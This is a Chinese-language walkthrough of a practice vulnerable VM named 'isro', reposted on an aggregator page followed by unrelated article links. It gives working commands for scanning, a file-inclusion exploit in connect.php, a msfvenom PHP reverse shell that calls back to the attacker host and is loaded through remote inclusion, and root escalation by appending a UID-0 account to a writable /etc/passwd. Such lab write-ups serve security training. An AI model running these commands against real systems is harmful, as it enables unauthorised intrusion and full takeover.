isro
时间:2021-09-27
本文章向大家介绍isro,主要包括isro使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
靶机准备
将下载的压缩文件解压,打开vmx文件即可
将网络模式设置为NAT
扫描获得ip:192.168.164.185
kali:192.168.164.137
netdiscover -r 192.168.164.0/24
渗透测试
扫描其端口
nmap -sS -sV -T5 -A -p- 192.168.164.185
开放3个端口:22,80,65534
扫描目录:
dirb http://192.168.164.185 -X .php,.txt,.zip,.html
扫到两个
思索半天无果,查看一些wp说是connect.php存在文件包含漏洞,测试
http://192.168.164.185/connect.php?file=/etc/passwd
有回显
利用:
制作反弹shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.164.137 LPORT=4444 R > shell.php
kali攻击机上开启web文件下载服务,
python -m SimpleHTTPServer
kali攻击机上开一个meterpretershell监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.164.137
exploit
通过访问
http://192.168.164.185/connect.php?file=http://192.168.164.137:8000/shell.php来制造反弹shell
访问后,在msf中获得shell
不是root权限,继续提权
转换为交互式的shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
查看/etc/passwd,ls -al /etc/passwd,发现当前账户可写
制作一个账户密码填进去,test:test
制作密码,
perl -le 'print crypt("test","salt")'
写入靶机/etc/passwd中
echo "test:salSp1wOPp6fk:0:0:test:/root:/bin/bash" >> /etc/passwd
成功提权
进入root目录获取flag
原文地址:https://www.cnblogs.com/zhaohzaomumu/p/15342997.html
- 用VS2010调试微软开放的部分源码
- python混账的编码问题解决之道
- 实用的前端开发小技巧汇集
- python编码问题
- 微信支付推出人脸识别智慧时尚试衣间,无感购物即将来袭
- 如何判断你买的域名有没有被K过?
- 【设计模式】Factory模式
- Windows:将cmd命令行添加到右键中方法
- 回家的低价票难抢?注意!可能是被“爬虫”吃了
- DeepMind团队回顾2017年:想象、推理取得突破
- flask-mail发送QQ邮件代码示例(亲测可行)
- 数据结构与算法C#版笔记--排序(Sort)-下
- pip --upgrade批量更新过期的python库
- 数据结构与算法C#版笔记--排序(Sort)-上
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 2017 年ICPC 中国大陆区域赛铜牌题解
- 搜索(DFS BFS)专题练习
- AtCoder Beginner Contest 171
- AtCoder Beginner Contest 173 A ~ F(已经补完)
- AtCoder Beginner Contest 174 A ~ E
- AtCoder Beginner Contest 170
- 【队伍训练3】Codeforces Round #661 (Div. 3)
- 购物
- 指纹锁(自定义下比较重载下set的圆括号比较)
- 糖糖别胡说,我真的不是签到题目
- 分数线划定
- 小C的记事本
- 简单的数据结构 (deque的应用)
- [HNOI2003]激光炸弹 (二维前缀和)
- 链表(实现插入一个数)